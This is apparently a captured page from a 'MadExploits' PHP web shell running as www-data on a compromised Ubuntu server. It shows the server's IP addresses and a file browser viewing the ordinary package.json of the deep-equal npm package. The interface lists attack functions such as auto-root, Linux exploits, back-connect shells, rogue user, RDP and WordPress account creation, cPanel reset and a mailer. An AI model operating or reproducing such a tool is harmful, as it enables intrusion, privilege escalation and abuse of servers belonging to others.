Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
deep-equal /
[ HOME SHELL ]
Name
Size
Permission
Action
example
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.travis.yml
116
B
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
index.js
2.98
KB
-rw-r--r--
package.json
1.06
KB
-rw-r--r--
readme.markdown
1.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "deep-equal", "version": "1.0.1", "description": "node's assert.deepEqual algorithm", "main": "index.js", "directories": { "lib": ".", "example": "example", "test": "test" }, "scripts": { "test": "tape test/*.js" }, "devDependencies": { "tape": "^3.5.0" }, "repository": { "type": "git", "url": "http://github.com/substack/node-deep-equal.git" }, "keywords": [ "equality", "equal", "compare" ], "author": { "name": "James Halliday", "email": "mail@substack.net", "url": "http://substack.net" }, "license": "MIT", "testling": { "files": "test/*.js", "browsers": { "ie": [ 6, 7, 8, 9 ], "ff": [ 3.5, 10, 15 ], "chrome": [ 10, 22 ], "safari": [ 5.1 ], "opera": [ 12 ] } } ,"_resolved": "https://registry.npmjs.org/deep-equal/-/deep-equal-1.0.1.tgz" ,"_integrity": "sha1-9dJgKStmDghO/0zbyfCK0yR0SLU=" ,"_from": "deep-equal@^1.0.1" }
Close